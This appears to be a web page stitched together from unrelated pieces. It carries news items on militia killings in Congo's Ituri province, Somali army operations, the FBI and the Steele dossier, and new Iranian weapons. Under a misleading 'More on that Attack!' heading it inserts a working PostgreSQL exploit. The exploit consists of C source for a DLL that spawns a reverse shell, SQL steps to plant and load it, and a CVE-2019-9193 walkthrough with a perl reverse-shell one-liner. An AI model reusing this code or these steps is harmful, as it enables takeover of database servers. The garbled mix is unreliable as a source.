Ituri province is on fire! 10 more people were killed by CODECO in the night of sunday-monday 29/06/2020

The attackers of the CODECO militia signed, on the night of Sunday to Monday, June 29, 2020, an attack in the locality Mungulumoya, 5 km from the center of Kunda in the chiefdom of Babelebe, in Irumu territory.
At least 10 civilians were killed and 3 others seriously wounded, during this attack of firearms and sharp bladed weapons.
Although the situation is already under control of the Congolese security forces, this locality remains emptied of its population, which has moved massively to the center of Kunda, about ten kilometers from the city of Bunia.
Faced with this situation, the provincial deputy Claude Malabo, urges the Congolese state to better secure the inhabitants, unjustly massacred.
"The army must secure the entities threatened by these enemies of peace. But I believe that we must also succeed in destroying them definitively. The population no longer knows how to live in peace following permanent threats, "said this elected representative from Irumu's electoral district.
In addition to Djugu and Mahagi, in recent months, certain entities in Irumu territory have also been the target of this militia of the Cooperation for the Development of Congo (CODECO).

More on that Attack!

#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1" #define PG_REVSHELL_CALLHOME_PORT "4444"
#include "postgres.h" #include <string.h> #include "fmgr.h" #include "utils/geo_decls.h" #include <winsock2.h>
#pragma comment(lib,"ws2_32")
#ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif
#pragma warning(push) #pragma warning(disable: 4996) #define _WINSOCK_DEPRECATED_NO_WARNINGS
BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL,                     _In_ DWORD fdwReason,                     _In_ LPVOID lpvReserved) {     WSADATA wsaData;     SOCKET wsock;     struct sockaddr_in server;     char ip_addr[16];     STARTUPINFOA startupinfo;     PROCESS_INFORMATION processinfo;
    char *program = "cmd.exe";     const char *ip = PG_REVSHELL_CALLHOME_SERVER;     u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);
    WSAStartup(MAKEWORD(2, 2), &wsaData);     wsock = WSASocket(AF_INET, SOCK_STREAM,                       IPPROTO_TCP, NULL, 0, 0);
    struct hostent *host;     host = gethostbyname(ip);     strcpy_s(ip_addr, sizeof(ip_addr),              inet_ntoa(*((struct in_addr *)host->h_addr)));
    server.sin_family = AF_INET;     server.sin_port = htons(port);     server.sin_addr.s_addr = inet_addr(ip_addr);
    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server),               NULL, NULL, NULL, NULL);
    memset(&startupinfo, 0, sizeof(startupinfo));     startupinfo.cb = sizeof(startupinfo);     startupinfo.dwFlags = STARTF_USESTDHANDLES;     startupinfo.hStdInput = startupinfo.hStdOutput =                             startupinfo.hStdError = (HANDLE)wsock;
    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0,                   NULL, NULL, &startupinfo, &processinfo);
    return TRUE; }
#pragma warning(pop) /* re-enable 4996 */
/* Add a prototype marked PGDLLEXPORT */ PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(add_one);
Datum dummy_function(PG_FUNCTION_ARGS) {     int32 arg = PG_GETARG_INT32(0);
    PG_RETURN_INT32(arg + 1); }
Here is the convoluted process of exploitation:
postgres=# CREATE TABLE hextable (hex bytea); postgres=# CREATE TABLE lodump (lo OID);
acidic@emma:~/$ echo "INSERT INTO hextable (hex) VALUES               (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt acidic@emma:~/$ psql -U postgres --host=localhost --file=sql.txt
postgres=# INSERT INTO lodump SELECT hex FROM hextable; postgres=# SELECT * FROM lodump;   lo -------  16409 (1 row) postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll'); postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS            'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT;

The arbitral command execution on postgreSQL

PostgreSQL, commonly known as Postgres is one of the largest and most popular database systems in the world. It is the primary database of Mac OSX but also has Linux and Windows versions available.
For a time I have been dealing with postgreSQL,I have keenly been monitoring the less well known ‘feature’ (CVE-2019–9193) which allows certain database users to gain arbitrary code execution in the context of the user running the Postgres instance. This is something which is enabled by default on all versions of PostgreSQL from 9.3 through to the latest of 11.2. This affects all operating systems, Windows, Linux and Mac.
Since version 9.3, new functionality for ‘COPY TO/FROM PROGRAM’ was implemented. This allows the database superuser, and any user in the ‘pg_execute_server_program’ group to run arbitrary operating system commands. This effectively means there is no separation of privilege between a database superuser user and the user running the database on the operating system.
This is a lack of defense in depth which we used to see in Microsoft SQL Server back in the early 2000s, when the xp_cmdshell function was enabled by default. This was patched and disabled by default in Microsoft SQL Server 2005, but it is interesting how the same bugs repeat, seemingly in cycles.
As this bug/flaw/functionality/exploit is somewhere between a privilege escalation and an arbitrary code execution, it needs some kind of prior authentication. This is achieved either through access to the database with credentials, or via exploiting an SQL injection in an application which has PostgreSQL on the backend. Again, in both of these instances either the superuser or a user with ‘pg_execute_server_program’ permissions needs to be in use.
To perform the attack, you simply follow these steps:
1) [Optional] Drop the table you want to use if it already exists
DROP TABLE IF EXISTS cmd_exec;
2) Create the table you want to hold the command output
CREATE TABLE cmd_exec(cmd_output text);
3) Run the system command via the COPY FROM PROGRAM function
COPY cmd_exec FROM PROGRAM ‘id’;
4) [Optional] View the results
SELECT * FROM cmd_exec;
5) [Optional] Clean up after yourself
DROP TABLE IF EXISTS cmd_exec;
Note that any single quotes inside your command must be double single quotes to escape them, so for example if you wanted to run:
echo ‘hello’;
You would need to put it inside single quotes, and then replace all single quotes inside with double single quotes:
‘echo ‘’hello’’;’
I have tested this on all major operating systems, and if a reverse shell is triggered you end up with the following privileges:
Windows - NT AUTHORITY/NETWORK SERVICE (low priv)
Linux - postgres (low priv)
Mac - user that installed postgres (usually an admin)
Linux and Mac OSX can usually be exploited with a perl one liner, with a command such as this:
COPY files FROM PROGRAM ‘perl -MIO -e ‘’$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’’’;
I have simplified the exploitation processes by releasing a new
Metasploit module (which should be
merged into the main framework soon), as the old postgres_payload modules only work up to around version 8. postgres_copy_from_program_cmd_exec.rb performs all of the above automatically, if you provide it with valid database credentials which have the correct permissions. For SQL Injections you will have to take the manual route. Here it’s exploiting PostgreSQL 11.2 on Linux Ubuntu 18.04:
For Windows however, the NETWORK SERVICE user appears not the have any write privileges, but it was still possible to trigger a reverse shell by using a PowerShell download cradle. This can be provided by settings the COMMAND variable to the PowerShell cradle command, take note to escape single quotes with a backslash \. 

The Somali national army seized 4 starategic villages from alshabab this ended weekend

The Somali National Army has seized four new strategic villages from Al-Shabaab militant group in Lower Juba region on Sunday.
The operations conducted by the government troops have taken the control of some villages including Janay Abdale, Hilishid, Mayonde and Garasceebe under Lower Juba region.
Lieutenant Ismail Abdimalik Moalim, the commander of the 16th brigade of the Danab forces, said the operations would continue until the troops reached all the areas controlled by AL-Shabab fighters.
The commander of the Darwish forces in the Jubbaland region told the media that he had begun operations against militias in the central town of Buale but still needs more effort to capture.
The forces have been conducting operations against al-Shabaab in the Lower Juba region in recent days to flash out Al-Shabab militant group in the region.

FBI refuses to reveal Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information

The identity of the source remains an enduring mystery, but whoever they are, they undoubtedly possess information that could shed light on innumerable inaccuracies in the dossier, which was cited extensively by the Bureau in its various applications for surveillance orders against Donald Trump campaign aide Carter Page.
The US Federal Bureau of Investigation has refused to release documents related to Christopher Steele’s primary source for his notorious ‘Trump-Russia’ dossier in response to a Freedom of Information request filed by The Daily Caller, on the basis the information is classified and risks identifying a confidential FBI source.
The Daily Caller sought all FBI records for an individual identified as “Primary Sub-Source” in Justice Department inspector general Michael Horowitz report on Crossfire Hurricane, issued December 2019 – the assessment found Steele’s source contradicted and dismissed key allegations made in the dossier, after they were tracked down and interviewed by FBI agents in January 2017. The former MI6 operative nonetheless dressed up “rumour and speculation” as fact – and the Justice Department ruled two FISA warrants to be invalid due to the Bureau’s omission of this compromising information.
— Chuck Bledsoe@gab.ai ✝ ﻥ #CCOT #MAGA🇺🇸 (@BledsoeChuck) June 26, 2020
In its response to the outlet, the FBI cited three exemptions under Freedom of Information laws to deny releasing the sought documents.
“The nature of your request implicates records the FBI compiles pursuant to its national security and foreign intelligence functions. [Disclosure] would trigger harm to national security interests…and/or reveal intelligence sources and methods. Disclosing source related records about an individual or entity could reasonably be expected to undermine the use of confidential sources as it would discourage cooperation with the FBI in the future. Therefore, your request is closed,” the Bureau stated.
It’s unclear if the FBI considers Steele’s source to be a confidential informant, but Steele himself reportedly told partners at Fusion GPS – the opposition research firm that commissioned the dossier – the individual was “well known to US intelligence and law enforcement officials”.
— Catherine Herridge (@CBS_Herridge) June 12, 2020
Republican lawmakers investigating the origins of the FBI’s investigation of the Trump campaign have recently accused agency director Christopher Wray of releasing documents about the probe too slowly. For instance, Jim Jordan of the House Judiciary Committee, has accused Wray of outright obstinance, while Lindsey Graham, chair of the Senate Judiciary Committee, wrote Attorney General William Barr on April 20 demanding all documents and communications related to the FBI’s interviews with the source, including FBI reports written about the individual, be released.

Iran creates new army weapons including rocket launchers and missiles

The new weapons, developed by a Revolutionary Guards’ agency responsible for military R&D, have been unveiled amid the Trump administration’s ongoing effort to convince the international community to continue to enforce an arms embargo against Tehran after its October expiry date.
Gen. Ali Koohestani, director of the Revolutionary Guards’ Ground Force Self-Sufficiency Jihad Organization, has given Tasnim News Agency a sneak peek at several new weapons systems for use by infantry formations.
The arms include the Qare’a, a disposable, lightweight rocket launcher made of composite materials, which features a rocket engine-powered 80 mm caliber missile. The weapon is said to have an effective range of 250 meters, and to be ideal for anti-fortification use.

Another of the R&D agency’s designs is a man-portable recoilless rifle dubbed the Nafez-2 (‘Penetrator-2’), a 19 kg anti-armour system which can also be used against enemy emplacements.
Finally, Koohestani unveiled the Ashtar, a unique, lightweight 7.62x64 mm sniper rifle with a range of up to one kilometer and a 24x optical scope.

It’s not clear from the report what stage of development the weapons are in, or whether they have been delivered to the military.
The Tasnim report comes just a day after the IRGC unveiled other arms, including a new armoured personnel carrier, drone and truck-mounted heavy machine-gun, all of them also developed by the Guards’ Ground Force Research and Self-Sufficiency Jihad Organization.
Despite spending just a fraction of what its regional adversaries and the US do on defence, Iran has managed to gain self-sufficiency in a range of areas, becoming one of just a handful of countries capable of building advanced drones and air defence systems, for example. The country began making a push toward self-sufficiency in defence in the 1980s after its US and Western European partners cut Tehran off from its traditional sources of arms following the Iranian Revolution and the Iraqi invasion. Before that, throughout the 1960s and 1970s, the country was one of the largest importers of US weapons systems in the Middle East.
Further moves toward self-sufficiency followed in 2010, after the United Nations Security Council introduced a weapons embargo against the Islamic Republic over its alleged nuclear program.
After 2015 and the signing of the Iran nuclear deal, the UN committed to lift its arms embargo in October 2020. However, beginning earlier this year, the US has lobbied to keep the restrictions in place, going so far as to argue that for all intents and purposes, Washington is still a party to the nuclear deal it withdrew from in 2018. Russian and Chinese diplomats have dismissed US lobbying efforts and hinted that they would veto any American effort to extend the embargo.

ADF and MAIMAI terrorising Walese-Vokontu chiefdom in Irumu territory in ITURI

The NGO-DH Convention for the respect of human rights (CRDH) in Irumu territory in the province of Ituri, alert on the illicit harassment and enrichment of Mayi-Mayi militiamen in several agglomerations of this territory in Walese chiefdom -Vonkutu.
According to its coordinator Christophe Munyanderu, who presented the  information onon Saturd, June 27, 2020, the latter demand a sum of 3,000 Congolese francs as well as a quantity of food from the farming inhabitants, who began to return to this region after the recent attacks by Ugandan ADF rebels.
"In general, in Irumu territory, there is the activism of armed groups, in particular the Mai-Mai militiamen in the Walese-Vonkutu chiefdom. While the latter commit atrocities on the population. They are demanding from each cultivator 3,000 FC and a quantity of food for their survival in this entity. " he declares.
Christophe Munyanderu demands the urgent involvement of the competent authorities to settle this situation. He wishes to see these militiamen be dislodged in this part, so that the population lives in peace.
Note that the Walese-Vokontu chiefdom in Irumu territory is also facing the activism of the ADF rebels. The latter have repeatedly attacked the villages of Ndalya, Biane, Mufutabangi and the surrounding area, causing the death of several civilians and the massive displacement of survivors.